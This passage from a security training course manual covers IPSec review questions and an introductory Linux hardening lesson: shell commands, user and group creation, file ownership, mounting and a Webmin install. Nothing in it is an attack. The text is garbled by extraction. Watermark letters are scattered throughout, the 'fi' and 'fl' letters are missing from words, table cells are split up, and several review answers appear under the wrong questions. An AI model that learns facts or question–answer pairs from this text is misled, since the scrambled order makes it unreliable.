Verify that all students have completed this task before you proceed, or the remaining tasks might not work as expected.
Summary
In this lesson, you worked with a Microsoft Management Console (MMC). You congured an MMC and viewed the default or built-in IPSec policies. You then created custom IPSec policies. You implemented and tested these policies. You also took a rst look at implementing lter lists and experimented with a couple of authentication methodspreshared keys and certicates.
Lesson Review
2A What are the two protocols in IPSec that are used to protect network traffic?
Ed
T DU PL IC
What are the two main modes of implementation for IPSec? Transport Mode and Tunnel Mode.
Tunnel Mode.
2B What are the three default IPSec policies in Windows 2000?
Server (Require Security), Server (Request Security), and Client (Respond Only). What integrity algorithms are supported in Windows 2000 IPSec? MD5 and SHA-1.
st
What encryption algorithms are supported in Windows 2000 IPSec? DES and 3DES.
In
2C What authentication methods are supported in Windows 2000 implementation of IPSec?

Kerberos, Certicates, and Preshared Keys. What are the default key lifetimes? A new key is generated for every 100 MB of data exchanged between the two IPSec devices or every 15 minutes, whichever is earlier.
DO
ru ct
If you are going to set up a VPN with IPSec, what mode will you probably use?
NO
or
AT
The Encapsulating Security Protocol (ESP) and the Authentication Header (AH).
iti
on
2D What protocol and port are used by ISAKMP during the negotiation process?
UDP and Port 500. In Transport Mode, while AH ensures the integrity of the entire IP datagram, ESP can be used to ensure the condentiality and integrity of the payload (or data).
2E When would ESPs integrity check be most usefully employed?
When implementing IPSec in Tunnel Mode. ESPs integrity check at the tunnel endpoint will ensure the integrity of the payload (including the encapsulated packet, internal IP headers, and all other data). Using lters, it is possible to explicitly control IPSec traffic.
Ed or ru ct st
In
DO
NO
DU
PL
IC
AT
iti
on
Hardening Linux Computers

Overview
In this lesson, you will be introduced to the core operation of Linux, specically Red Hat Linux version 8.0. You will examine the process of securing les and directories, and securing user accounts and passwords. You will secure services and network connections, and disable unneeded services. The lesson will end with the implementation of SSH for secure communication and the functioning of Bastille, for total system hardening.
LESSON
Objectives
In this lesson, you will: 3A Perform fundamental Linux administration.
Ed
T DU PL IC
3B
Congure fundamental Linux security.
You will create le and directory permissions, secure user passwords, and implement Pluggable Authentication Modules (PAMs). 3C Secure access to Linux services.
You will secure access to services by conguring and implementing TCP wrappers and xinetd. 3D Congure network services.
3E
Harden Linux.
st
In
DO
You will secure the system startup and shutdown processes, examine Linux logging, implement Tripwire, and lock the machine with Bastille.
NO
You will use the Network File System and Samba as network services, and examine methods of securing these services.
ru ct
or
Lesson 3: Hardening Linux Computers
AT
You will navigate in Linux to create users, groups, les, and directories. You will modify their properties, and identify system information.
E
137
iti
on
Data Files none
Lesson Time 8 hours
Topic 3A
Introduction to Linux Administration
No discussion on Linux would be complete without a mention of open-source software. Open-source software does not mean that access is available to the source code of the application. Open-source software is dened by the Open Source Initiative (www.opensource.org/) as having 10 different criteria that must be met to be considered open source. These criteria include distribution, license, source code, and redistribution issues. The following list, from the Open Source Initiative, describes the general open-source criteria. 1. Free redistributionThe license on the software must not restrict anyone from selling or giving away the software. The license is not to require a fee or royalty for distribution. 2.
Open-source Criteria
3.
Derived worksThe license on the software must allow for modications and creation of derived works, which must in turn be made available using the same terms as the license on the original software. Integrity of authors source codeThe license on the software is allowed to restrict the distribution of the source code if the license allows for the distribution of patch les with the source code, for the purpose of modifying the software at build time. The license may require any Derivative Works to use a different name and/or version number from the authors original software.
4.
Ed
T DU
Source codeThe software must include the source code, along with the compiled software. The code is to be in a format preferred by programmers who would use it to modify the program.
6. 7.
st
10. License must be technology-neutralNo provision of the license may be predicated on any individual technology or style of interface.
138
In
DO
ru ct
8. 9.
No discrimination against elds of endeavorThe license on the software must not restrict use of the software in any eld of endeavor. Distribution of licenseThe rights on the software must apply to all whom the software is redistributed to, without execution of new or additional licenses. License must not be specic to a productThe license on the software must not be dependent on the software being part of a specic software distribution. License must not restrict other softwareThe license on the software must not place any restrictions on other software that is distributed along with the licensed software.
NO
PL
IC
5.
No discrimination against persons or groupsThe license on the software must not discriminate against any person or group of persons.
or
AT
iti
on
Linux
Linux is an operating system (OS) similar to UNIX, originally created by Linus Torvalds, with programming help from around the world. Linux is developed under the GNU General Public License. The GNU Public License is a full legal document, which addresses the points raised under the general guidelines of the Open Source Initiative. The GNU document can be found at www.linux.org/info/ gnu.html. Linux itself can be found in many variations today. Although the source code is available to be downloaded and used at will, there are many packages of Linux that are not distributed for free. These organizations are able to charge money for their distribution of Linux, allowing that the source code is always released and available. Some of the Linux distribution packages include Red Hat, SuSE, Caldera, and MandrakeSoft.
The Kernel
st
Basic Navigation in Linux
Term
Shell prompt (Terminal Window)
In
In order to use Linux, and to follow the tasks in this lesson, you will need to become familiar with some of the fundamental terms and phrases. These common terms are quickly dened as follows, and will be discussed in more detail where they come into the text of the lesson. Denition
A command-line interface that functions as a go-between between the user and the operating system.
DO
NO
There are many different graphical interfaces in Linux. These interfaces in Linux are often referred to as window managers. Popular graphical interfaces are the K Desktop Environment (KDE) and the GNU Network Object Model Environment (GNOME). These window managers provide users with point-and-click and dragand-drop functionality and create user-friendly environments.
DU
Most people who work with Linux are comfortable with using the command-line interface to work with the operating system. However, as Linux continues to gain mainstream use, the inclusion of graphical interfaces has become an additional feature that users enjoy.
ru ct
PL
The Graphical Interfaces
IC
A major benet to the design of Linux is that the kernel is modular. This means that the individual components of the kernel can be easily updated and modied as new research dictates.
or
AT
When Linux is turned on, it loads and runs the core operating system program, which is called the kernel. The core operating system is then designed to run the other applications on the computer. The kernel is something that is always under development, and is always available in both a stable release and testing release.
Ed
Linux is developed to run on personal computers, but it can run on many platforms other than the PC. Linux has been ported, or modied, to run on the following platforms: PowerPC, Macintosh, DEC Alpha, Sun Sparc, and others. Linux has POSIX compatibility in order to interoperate with other UNIX-like computers.
E
139
iti
on
In this lesson, the Linux distribution used is Red Hat 8.0.
Term
Command line Panel Root
Denition
The actual location in the shell prompt where a user will enter commands to the operating system. A toolbar, found often across the bottom of the screen, which contains buttons and shortcuts to often-used applications. A user account created during the installation of the operating system. Root has complete access to the system. There are applications that must be run using the root account. The root account has similarities to the Administrator account in Windows or the Supervisor account in Novell. As root has complete control over the system, care must be taken that the account is properly secured. This account is sometimes referred to as the superuser account. The su command enables a user to substitute another user account, such as the Root account, without initially logging in as root. This allows for the running of applications that require root access from a Shell Prompt, while logged in as a non-root user. The abbreviated way of saying manual page. The man pages are the information about a command. For example, to learn about the function and/or use of the SU command, invoking the command man su at the command line shows the information about the su command. To close a man page, press the Q key. The GUI environment in Linux. When using the X Window you are simply using the GUI instead of the pure command line function of a console.
SU
Man page
X or X Windows
Ed
T DU
Logging In
st
As mentioned earlier, there are several different window managers, such as KDE and GNOME. For this lesson, the GNOME GUI is the one that will be used. An example of a freshly installed GNOME desktop is shown in Figure 3-1.
140
In
DO
ru ct
The GUI
Logging in to Linux requires authentication, just as in any other modern operating system. When rst using the system, you are required to log in as root. Once you are in the system, you should create user accounts as needed for the users of the system. The user accounts are case-sensitive, so ROOT and root are two different accounts. The default root account is all lower-case. A password is created for the root account during the installation of the operating system. During the installation, Red Hat provides the option of logging in to either the text mode or the graphical mode of operation. If the system is congured to use text mode, after you enter your credentials, you will remain in the text mode of operation. To switch into the graphical user interface, you can enter the startx command, provided that X Windows has been properly congured on the machine.
or
NO
PL
IC
AT
iti
on
or
DO NO
The Nautilus File Manager is the access point to les and directories in the GUI. You can display the contents of a le within a Nautilus window, or you can open the le with a different application from Nautilus.
In
Workspaces provide the user the ability to have separate working desktops. You can open several windows in one workspace, for example, and then use the Workplace Switcher to switch to another workspace with no open windows. Figure 3-2 highlights these features of GNOME, showing two open workspaces.
st
The Desktop Background component is located behind all the other components on the desktop, and is an active part of the user interface. Objects can be placed on the Desktop Background for quick access, and by right-clicking anywhere on an open portion of the Desktop Background, you can open a menu to open different programs, such as a Terminal.
The Main Menu is where you can access applications, make system conguration changes, nd les, and more. In the Red Hat 8 distribution, the Red Hat icon, with the small triangle, is the Main Menu. In other installs of GNOME, the Main Menu is a footprint icon.
DU
Menus can provide access to nearly all the les and functions of the system. Menus can be accessed from the menu panel by clicking the Main Menu.
ru ct
PL
The primary components of the GNOME desktop are panels, menus, windows, workspaces, Nautilus File Manager, Desktop Background, and the Main Menu (sometimes called the Start Here location). There can be several panels on the desktop, although the starting conguration of GNOME is to have one panel (called the menu panel) across the bottom.
IC
AT
E
141
Figure 3-1: The GNOME desktop on a new install of Red Hat Linux.
Ed
iti
on
Ed or
DO NO
Terminal Window
Figure 3-2: Desktop components highlighted on a Red Hat Linux system.
ru ct
In
st
DU
Although much of the administration of the Linux computer can be done by using a GUI, there are many people who will use the Terminal Window for muchif not allof their administration. Similar in nature to the DOS (or command) prompt on a Windows machine, the Terminal Window is where you can enter commands to be executed by the computer.
PL
IC
AT
iti
on
Figure 3-3: A blank Terminal Window opened in Red Hat 8.
Common Commands
Ed
DU T PL IC
Linux Notation or Command

/ ./ ../ cat cd cp echo $PATH export history
ru ct
Because many of the tasks in this lesson will be performed in the Terminal Window, it is important for you to become familiar with the Terminal Window and some frequently used commands. Recall that in Linux, le names, directory names, and commands are case-sensitive. When you are logged into the Linux machine, you will see the following prompt: [root@rh /]#. This is an indicator of the user account logged in (in this case, root) and the computer name (in this case, rh), along with the current directory (in this case, /). The following table lists only a small grouping of the many commands in Linux, but you should become comfortable with all of them, including their functions.
or
DO NO
AT
Description
ifcong
Root directory. Current directory. Parent directory. The catalog command lists the contents of a le. Common use: cat <filename> The change directory command changes the current directory. Common use: cd <directory_name> The copy les command copies a le to a specied destination. Common use: cp <source_filename><destination_filename> The echo $PATH command lets you see your current path, or the directories in which the system will search for executables. The export command shows the current OS environment variables. The history command shows the command history of the terminal session, up to 500 commands. You can see a shorter list, though; for example: history 10 The ifcong command shows your current TCP/IP conguration.
In
st
E
Common Linux Commands (2 slides) If students are interested and time permits, lead a short discussion that focuses on comparing these Linux commands to their Windows and DOS counterparts.
iti
143
on
Linux Notation or Command

kill ls ls -al ls -l man mkdir mv passwd ps pwd rm rm -r rmdir shutdown touch
Description
The kill command ends a running process. Common use: kill <PID>, where PID is the Process ID. The list command shows the contents of a directory. Common use: ls <directory_name> Using the -al option with the list command shows the contents of a directory, including the system les, in long format. Using the -l option with the list command shows the contents of a directory in long format. The manual command opens manual pages (the le documentation) for a specied command. Common use: man su The make directory command creates a new directory. Common use: mkdir <directory_name> The move command moves les and/or directories. Common use: mv <current_filename><new_filename> The password command changes your password. The process status command lists the running processes and their Process IDs. The print working directory command lists the full path of your current working directory. It does not list the contents of the directory. The remove command deletes a specied le. Common use: rm <filename> Using the -r option with the remove command deletes a directory and all of its contents. Common use: rm -r <directory_name> The remove directory command deletes an empty directory. Common use: rmdir <directory_name> The shutdown command shuts down the system. The touch command creates a le. Common use: touch <filename>
Ed
Effect
or
DO NO
ru ct
Key Combination
Ctrl+Alt+Backspace
In addition to the commands listed, you might want to use the keyboard shortcuts that are available. Some of the common shortcuts are as listed in the following table.
Ctrl+Alt+Delete
Ctrl+D
In
Ctrl+Alt+Fx
Up Arrow
Kill X. Kills the current X session, and returns to the login screen (used if the normal exit does not work). This key combination works only in the GUI. Shut down and reboot the system. Shuts down the current session, and reboots the OS (used if the normal shutdown does not work). Log out of a terminal or console session (used instead of entering exit or logout). Switch screens. Ctrl+Alt and any function keyF1 through F7 displays a new screen. F1 to F6 are text screens, while F7 is the GUI. Scroll through command history in the Terminal Window.
144
st
DU
PL
IC
AT
iti
on
The following task is designed to walk you through the basic process of using Linux, creating directories and les. You will then copy, move, and delete les. If at any time you would like to see the options for a command, use the -help or -h switch after the main command; for instance, chmod -help. You can also use the man pages to nd out more details about any command.
TASK 3A-1
Navigating in Linux
1. 2. 3. 4. 5. 6. 7. 8. 9. Reboot and log on to Red Hat 8 as root, with the password qwerty.
If the GUI does not start automatically, enter startx at the command prompt. Right-click anywhere in the Desktop Background, and choose New Terminal.
In the Terminal Window, enter cd / to navigate to the top of the directory structure. Enter mkdir lab1 to create a new directory.
Enter touch le1 to create a le.
or
DO NO
Enter ls -l to view the detailed contents of the lab1 folder.
ru ct
10. Enter cp /lab1/le1 /lab2/le2 to copy the le from one directory to the other. 11. Enter ls to verify that le1 is still in the lab1 directory. 12. Change to the lab2 directory by using the cd command. 13. View the contents of the directory by using the ls command. 14. Change back to the lab1 directory.
16. View the contents of the directory.
17. Change to the lab2 directory, and verify that it contains both les. 18. Enter rm le2 to delete (remove) a le. When you are prompted to conrm the removal, enter y. 19. View the contents of the directory.
In
st
15. Enter mv /lab1/le1 /lab2 to move the le from one directory to the other.
T
DU
PL
IC
AT
Enter cd /lab1 to change to the lab1 directory.
E
145
Create another new directory named lab2 by using the mkdir command.
Ed
iti
on
User and Group Accounts

As with any other modern OS, the person managing the system will need to create user and group accounts for the individuals that require access to the resources of the system. Linux is no different in this regard. User accounts and group accounts are required, and there are several methods that you can use in their creation. User accounts might be used by individual people accessing the system, or they might be used by logical access (or system access). Regardless of whether or not the user account is for a person, or a system process, it will be assigned a User ID (UID) and a Group ID (GID).
Ed
T DU
In Linux, you can see the current user list by looking at the /etc/passwd le. As we continue farther into this lesson, this le might change, so at this time, you are looking at a default /etc/passwd le. Figure 3-4 shows an example of this le.
or st In
Figure 3-4: The default /etc/passwd le on a Linux computer.
DO
ru ct
NO
PL
IC
AT
iti
Groups are the logical grouping of users that have similar requirements, such as the need for similar le permission assignments. Upon creation, each user account will have a primary group associated with it. When a user account is created, a group of the same name is created, and the user account is the sole member of that group.
on
In the /etc/passwd le, there are several elds, separated (or delimited) by a colon. These elds describe the individual user account. The following list explains each of these elds: User Account Name: This is the login name for the user account.
User ID: This is a numerical identier assigned to each user account upon creation. This is sometimes referred to as the UID.
Group ID: This is the numerical identier associated with the home group to which the user belongs. This is sometimes referred to as the GID. Full Name: This might be the full rst and last name of the user. Home Directory: This is the default current directory at login time for this user account.
Standard Users and Groups
ru ct
st
Figure 3-5: Several of the standard user accounts on a Red Hat Linux machine.
In
DO
NO
T
DU
PL
In the Red Hat distribution of Linux, several default user accounts, called standard users, are created during the installation of the OS. These accounts have default UID, GID, home-directory, and shell values. Figure 3-5 shows several of these standard users.
or
IC
AT
In Linux, user and group accounts are assigned easy-to-remember and easy-tomanage names for the benet of the users and administrators. To the computer, the signicant variables are not the human-readable names, but the numeric identiers. When a new user is created, it will be assigned the rst available UID and GID, starting at 500. The UID and GID numbers increase by one for each new user account created.
Ed
Shell: This is the command interpreter that will load when the user logs into the Terminal interface. If the user logs into the GUI, then this is the shell that loads at the Terminal.
E
147
iti
on
Password: This is the login password for this user account. If the only thing that is on screen is an X, then the password is protected in a shadow password le. (Shadow passwords are discussed later in this lesson.)
The standard accounts can be found in the /etc/passwd le, just as any other account. These are examples of the system accounts, versus the user accounts created for individual access. In addition to the standard user accounts, several standard groups are also created upon installation. These groups can be found in the /etc/group le. Figure 3-6 shows several of the standard groups.
Ed ru ct st In
This simple syntax can be used to add a user quickly to the system. Several switches can be used during the creation of the account. Two of note, at this time, are the -d and the -s switches. The -d switch enables you to specify a home directory. If no directory is specied, the user will be assigned a default home directory in the form of /home/useraccountname; for instance, for a user called jkmack, the default home directory would be /home/jkmack. The -s switch enables you to assign a shell to this user. If no shell is specied, the user will be assigned the default shell of /bin/bash.
DO
NO
useradd -g Users Linux1 passwd Linux1 New password: qwerty Retype new password: qwerty
DU
You can add users and groups to Red Hat Linux from within a Terminal session or from within the GUI. The basic command for adding a user is useradd, followed by the group, then the account name. The new account is locked until you assign a password or congure the account so that the user must assign a password during the rst login. So, in the following command sequence, a user account called Linux1 is added to the Users group, with a password of qwerty:
PL
IC
Adding Users and Groups
or
Figure 3-6: Several of the standard groups on a Red Hat Linux machine.
AT
iti
on
If you want to add a group to the system by using the command-line syntax, use the groupadd command. With this command, you create the group and the GID at the same time. The switch for dening the GID is -g. If you do not dene a GID during the creation of the group, the system will assign the next available number to the group. So, the following command creates a group called SCNP_Admins, with a GID of 1024:
groupadd -g 1024 SCNP_Admins
Although the command-line method for adding user and group accounts is useful, many administrators are starting to become more comfortable with using the GUI tools that are available. In Red Hat, the GUI tool for adding and working with user and group accounts is called User Manager. To run User Manager, click the Main Menu, then choose System SettingsUsers And Groups.
Ed or ru ct
Figure 3-7: Red Hat Linux User Manager, showing user accounts.
In
Adding a new user in the User Manager is a straightforward process. Once you click the Add User button, simply ll in the elds, and click OK. If you want to change the properties of a user account, select the user account, then choose FileProperties. There are four tabs to manage for the user account. They are described in the following list: User DataThis tab is where the primary data is located, such as user name, full name, password, and home directory
st
Account DataThis tab provides the option to set the account as locked out or to create an expiration date for the account. Password InfoThis tab shows when the password was last changed, and can be used to set a limit, in days, before a password change is required. GroupsThis tab lists the groups that the user belongs to, along with the users primary group.
Lesson 3: Hardening Linux Computers 149
DO
NO
In User Manager, you can see all the user accounts in the system, along with their congurations. If you want to see all the system accounts as well, choose Preferences, and clear the option to lter system users and groups. Selecting the Groups tab enables you to see the group accounts on the system.
DU
PL
IC
AT
iti
on
Adding a new group in User Manager is similar to adding a user account. Once you click the Add Group button, dene the group name and GID, if desired; otherwise, the system will assign the next available number for the GID. Once the group is created, you can add users to the group by selecting the group and choosing FileProperties.
Ed
Figure 3-8: Red Hat User Manager, showing group accounts.
or
DO NO
TASK 3A-2
ru ct
1. 2.
Creating and Modifying Users and Groups
Enter useradd -g users User1 to create a user account with the name User1. Enter passwd User1 to unlock the account and prepare to assign the password. When you are prompted to enter and retype the new password, enter 1resU From the Main Menu, choose System SettingsUsers And Groups to open User Manager. Verify the existence of the new user account. Check the UID assigned. Switch to the Terminal Window, and enter usermod -u 507 User1 to change the UID to number 507. Return to User Manager, click Refresh, and verify that the UID has changed.
In
150
st
3. 4. 5. 6.
Switch to the Terminal Window, and enter groupadd -g 510 Testers to create a group called Testers, with a GID of 510.
DU
Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.
PL
IC
AT
iti
on
7.
Switch to User Manager, select the Groups tab, and verify that the Testers group is displayed and that the GID is 510. You might need to click the Refresh button to see the change. Switch to the Terminal Window, and enter groupmod -g 515 Testers to change the GID. Switch to User Manager and verify that the GID has changed for the Testers group.
8. 9.
10. Select the Testers group, click the Properties button, and select the Group Users tab. 11. Check User1, then click OK to add the User1 user account to the Testers group. 12. Close User Manager. You will use the Terminal Window in the next task.
Switching User Accounts
ru ct
st
Linux, just as any other operating system, has a method for organizing the information held in les and directories. In Linux, the le system is viewed in a different regard than in Windows. The Linux le system is a combination of all partitions, directories, storage devices, and les. Storage media are not outside components of the le system; they are to be added as an integral part of the le system, and removed when no longer required. This is considered a unied le system, where parts of the le system can reside on different, and unique, physical media. Figure 3-9 shows the unied le system of a Linux computer.
The Unied File System of a Linux Computer
In
DO
NO
Linux File System
T
DU
The Substitute User (su) command can be run to execute a shell as a different UID and GID than the user you are currently logged on as. The command is simply su <username>. So, if you want to log in as root, use the command su root. You will need to provide the correct password for the root account to gain access; the command alone does not grant access.
PL
There are, however, applications that require root-level access to run. So, if you have an application you want to run, while administering the machine and the network, what are you to do, if you shouldnt log in as root? The answer is to use the Substitute User command for that specic moment.
or
IC
AT
The root account must be secured, as it is the one account that has the ability to take complete control of the computer. Any intruder that gains root access has essentially taken control of the computer away from you. For this reason, the root account must be protected at the highest level. You should only log in as root when absolutely required; such as to modify system les or to manage services on the computer.
Ed
E
151
iti
on
Figure 3-9: The unied le system of a Linux computer. One thing you may notice right away is that there are no drive letters in the le system. The drive letters that are assigned to partitions in Windows do not exist here, so there is no C drive, D drive, and so on. In Linux, for a partition to be noticed by the system, the system must be told of the existence of the partition, but les are not accessed based on the physical structure of the drive. All les are accessed in the logical, unied le system.
Ed
T DU
or
DO
Description
Device Names and Locations
st
152
In
ru ct
Location
/dev/hda /dev/hdb /dev/sda /dev/sdb /dev/fd0 /dev/fd1
Another difference that Windows users will notice is that there is no concept of the 8.3 le naming convention that many are used to using. Linux les can have le names up to 256 characters, and they are case-sensitive. Therefore, these three words represent three different les: FILE, File, le. It is also not uncommon for Linux les to have what appear to be multiple extensions. A common example of this would be scp_le.tar.gz.
Now that you have been introduced to the concept of the logical unied le system, you need to examine the structure of physical disks, and how Linux views partitions. Hard disk drives and oppy disk drives have predened device names in Linux. The following table shows the Linux location and description of the predened devices.
First (Primary) IDE hard disk drive Second (Secondary) IDE hard disk drive First SCSI hard disk drive Second SCSI hard disk drive First oppy disk drive Second oppy disk drive
NO
Disks and Partitions
PL
IC
AT
iti
on
As previously mentioned, Linux does not use partitions as Windows operating systems do. There are no assigned drive letters for partitions. In Figure 3-10, you will see that there are two hard disks, each with a partition dened. Disk 1 is the physical storage for several of the directories, and Disk 2 is the physical storage for other directories.
Ed
Location
/dev/hda1 /dev/hda2 /dev/hdb1 /dev/hdb2
ru ct
Description
First hard disk, rst partition First hard disk, second partition Second hard disk, rst partition Second hard disk, second partition
Mounting Devices
st
mount /dev/cdrom /mnt/cdrom
If you were to enter this command, you would see the following output:
Mount: block device /dev/cdrom is write-protected. mounting read-only
In
For example, suppose you wanted to access a CD-ROM. You would rst need to mount the CD-ROM drive to the le system. To do this, use the mount command, as shown here:
DO
Devices in the Linux le system are found in the unied le system just as any other object that needs to be accessed. However, in order for these devices to be accessed, they must be mounted. Mounting of a device is the process of making that device available to the le system.
NO
DU
PL
Users of this computer will not be able to identify the two disks when they are looking at the contents of the root directory. The only place where the physical structure is visible will be in the /dev directory. In this directory, the hard disks and partitions are dened as shown in this table.
or
Figure 3-10: Partition structure in the unied le system.
IC
AT
E
153
iti
on
Partition Structure in the Unied File System
Using the mount command as shown will allow the device /dev/cdrom to be accessed in the /mnt/cdrom directory, using the unied le system. The output response is indicating the device has been mounted, and is listed as a read-only device. Because the structure of the le system is logical, you can change the default nature of mounting devices as described. For example, the default action of mounting a CD-ROM drive is to have the mount point be /mnt/cdrom. However, if you wanted to change this, you could. If you wanted the CD-ROM to be accessed right off the root directory, you could add a directory and point the CD-ROM device to that directory. The following commands are all that will be required to make the CD-ROM accessible in this manner:
umount /dev/cdrom
Inodes
or
DO NO
ru ct
File size in bytes.
To view the inode numbers associated with les, you use the ls -i command.
File access and type information, otherwise known as the mode. Time the le was last modied. Time the le was last accessed.
File address in physical blocks.
154
In
st
In the list of items in the inode, you will not nd the le name and directory location. Those pieces of information are found in the directory itself, which maps le names to inodes. All that the le system is concerned with is the inode number associated with a le; the name is somewhat irrelevant. The number of an inode is associated when a le is rst saved to a block on the le system. During formatting, blocks of equal size are created, each with an associated number for identication.
Time the inode itself was updated.
DU
File ownership information.
PL
This section focuses on the inode of an individual le, and its structure. The data in a les inode contains the following:
IC
Every le in the le system is described by a block of data called an inode. You will see inode dened as both Information Node, and Index Node, based on the text you are reading. Here, we will refer to it simply as inode. Similarly, although on a larger scale, the entire le system is described by a block, known as the super block. The super block contains information about the le system, including the overall size of the le system and the number of inodes.
Ed
Using these two commands, you will be able to access the contents of a CD-ROM disc at the /cdrom prompt. If you want to change the location of a device that has been previously mounted, you rst need to unmount that device. To unmount a device, such as the CD-ROM drive, use the umount command, as shown here:
AT
iti
mkdir /cdrom mount /dev/cdrom /cdrom
on
File Structure
Earlier you used the ls command to list the contents in a directory. You might have noticed much more information than just the le name in the output from this command. All les in Linux are associated with a user and a group. Take the following le example:
-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt
You might assume that the output was created from issuing the ls -l rstdoc.txt command. Remember that the -l switch on the ls command shows the complete listing for the object; in this case, the rstdoc.txt le. Here is a breakdown of what the output is dening (the description of the eld, followed by the output in the example): File Access Permission: -rwxrw-r- Number of Links: 1 File Owner: User1 Group: Testers File Size (bytes): 512 Last Modication Date: Oct 24 Last Modication Time: 19:42 File name: rstdoc.txt
Ed
T DU PL IC
If the rst character is the letter d, then the object is a directory.
If the rst character is the letter b, the object represents a block device, such as a disk drive. If the rst character is the letter c, the object represents a character device, such as a serial port.
st
In
lrwxrwxrwx 1 User1 Testers Oct 24 19:42 sales -> march.tar -rwxrw-r-- 1 User1 Testers 2048 Oct 24 19:42 march.tar
DO
A symbolic link is a link that points to another le, similar to a Windows shortcut. A symbolic link does not contain data; it only refers to another target le, in another location. The other location can be on the same computer, or on another machine entirely across the network. The following two lines show how a symbolic link can be used. The rst line is the link, which points to the le found on the second line. Accessing the link on the rst line will display the le of the second line.
ru ct
If the rst character is the letter l, then the object is a symbolic link to another le.
NO
or
Although the permissions will be discussed in detail later, at this moment there is one section of the File Access Permissions that will be detailed. The rst character of the permissions is not technically a permission; rather, it has a special meaning. The rst character can dene any one of the following: If the rst character is a dash (-), then the object is a normal le.
AT
E
155
iti
on
TASK 3A-3
Viewing File Details
1. 2. 3.
If necessary, change to the lab2 directory.
Enter ls -l to view the details of the le you made earlier.
Object Ownership
or
DO NO
chown vp_finance payroll.doc
ru ct
chown vp_finance.accounting payroll.doc
In
st
In the event that the requirement is to change the ownership of a directory, and all the les or directories inside that directory, then the command is chown with the -R switch. The rst example will change the ownership of the /marketing/ June directory to have the marketing group as the owner and vp_marketing as the user. The second example does not change the user of the object, but changes the group:
chown -R vp_marketing.marketing /marketing/June chown -R .marketing /marketing/June
After the previous command has been entered, then all les and directories in the /marketing/June directory will have the marketing group as the group owner. To change the group ownership of a le or a directory if you are not the root account, you can use the chgrp command; however, in order to use this command, you must belong to both the current group that has ownership and the group to which you want to assign the ownership.
DU
If you want to assign a new group to the object, the command is similar. The only difference is to add the user account, then a decimal point and the group. In the following example, the le called payroll.doc is having the user account vp_nance and the group account accounting assigned as the new owners:
PL
IC
The only user account that can change the ownership of a le is the root account. In addition to changing a les ownership, the root account can change the ownership of a directory. The command for changing the ownership of a le is chown <new owner> <filename>. So, in the following example, a le called payroll.doc is having the user account vp_nance assigned as the new owner:
Ed
As you saw in the le structure, every le has an associated group and a le owner. By default when you create a new le in your home directory, you will be the owner, and your primary group will be the assigned group for that le. There may be instances, however, where you will need to change the owner of an object, such as le, to allow for others to manage the object.
AT
iti
Observe the structure of the le in the directory, paying particular attention to the owner, group, access times, and le size.
on
Webmin
Although you will most likely become quite comfortable, if you are not already, with managing your Linux machine from the Terminal Window and in the GUI, there is another administrative tool that is available for you to use. The tool is called Webmin. Webmin is a Web-based graphical interface for managing and making system administrative changes. Any Web browser that supports tables and forms will work for this tool. By using Webmin, you can change to user accounts, congure le sharing, manage DNS, and more. Figure 3-11 shows a simple layout of Webmin, once the user has logged in.
Ed or ru ct
Figure 3-11: Basic layout of Webmin.
st
In
DO
Webmin is a freely available tool that can be found at www.webmin.com. In this course, the version used is 1.020. Updates are available at the Webmin Web site, so you can update as you wish.
NO
T
DU
PL
IC
AT
E
157
iti
on
TASK 3A-4
Installing Webmin
1.
Use the Nautilus File Manager to open your home directory. (From the Main Menu, choose Home Folder, or double-click the roots Home icon on the workspace. Navigate to the / (root) directory.
2. 3. 4. 5. 6. 7.
Right-click the open space, and choose New Folder. Name the new folder Webmin.
Switch to the Terminal Window, and change to the new directory using the cd /Webmin command. Follow your instructors directions to install Webmin. When you have accepted all of the default answers, the system should report a successful installation. A default installation of the Webmin RPM sets the login name and password to roots login credentials, while a default installation of the Tarball sets the login name as admin and the password as blank, or null.
Ed
T DU
Copy the Webmin Tarball or RPM to the new /Webmin directory. Your instructor will provide the location of the Webmin installation le.
or
DO NO
In
Allow students 5 to 10 minutes to explore Webmin.
158
st
ru ct
9.
In the Browser address bar, enter http://localhost:10000, and press Enter.
10. In the login screen that is displayed, enter the login credentials for Webmin. This should be admin and no password, if you performed the default Tarball installation, or roots credentials, if you performed the default RPM install. 11. In the Conrm box, click No. In the Security Warning box, click Continue. 12. At this stage, make no conguration changes, but feel free to perform some basic navigation. 13. When you are done exploring Webmin, close the Webmin window, and close the Nautilus File Manager.
System Information
The last fundamental component of managing a Linux system that is discussed in this topic is the issue of nding and viewing system information. When securing your Linux system, you will want to know what processes are running, and how to identify those processes.
PL
8.
Test Webmin by opening a Web browser. The Web browser is the globe icon next to the Red Hat Main Menu icon.
IC
AT
iti
on
Process IDs
Every executable le on the computer can be thought of as a program. When a program is executed this is referred to as a process. On a Linux system, associated with each process is a unique numeric identier known as the Process Identier (PID). Users can create processes, control the execution of a process, and even receive notication if the processes execution status changes.
Viewing the System Information

There are several commands that you can run to display and analyze the performance of a system. Two of these commands are ps and top. By using these commands, you can identify running processes, the amount of CPU time a process is taking, the user account associated with the process, the amount of memory a process is taking, and more. Figure 3-12 shows what the ps command output looks like.
Ed or ru ct
Figure 3-12: The basic information provided by the ps command.
In
Although the above information is useful and provides solid data, there might be times when you are looking for a higher level of detail. In that case, you can use the ps command with aux. The ps aux command lists all the processes on the system, including the user account associated with each process. Figure 3-13 shows what the ps aux command output looks like. In the ps aux command, aux provides: aAll processes
st
DO
NO
DU
The ps command identies the processes running by the current user, while ps aux identies all running processes.
uAdditional user information xExtended process listing
PL
IC
AT
E
159
iti
on
ru ct st
In
DO
NO
By now, you should be comfortable with the fact that in Red Hat Linux, there are often several ways to complete a task, namely the command-line tools and the GUI tools. There is also a tool available in the GUI that can display system information interactively. This tool is called System Monitor. System Monitor allows you to select columns to sort data, in either ascending or descending order.
DU
PL
Using the ps command shows the processes and other data in a snapshot when the command is run. In many instances, this will provide the exact information that you were looking for. If, however, you are trying to see the processes running interactively, you will need to use the top command. By default, the top program updates the screen every second. If you wanted to increase the interval to every 7 seconds, for example, you would use the command top d 7. There are additional functions available while running the top programto see the list of what is available, press the H key while top is running.
or
IC
AT
Figure 3-13: Running the ps aux command shows more detailed information than the ps command alone.
Ed
iti
on
Ed or
DO NO
Figure 3-14: Running the System Monitor in Red Hat Linux.
ru ct
Figure 3-15: Viewing disk-space allocation on a Linux system by using the df -h command.
In
st
T
DU
One other piece of system information that you might want to identify is the disk space used. To view a report on the systems use of allocated disk space, you can use the df command. Entering df in a Terminal Window shows disk-space information. The default view shows the disk information in 1-K blocks. To view the information in GB and MB units, use the -h option, as shown in Figure 3-15.
PL
IC
AT
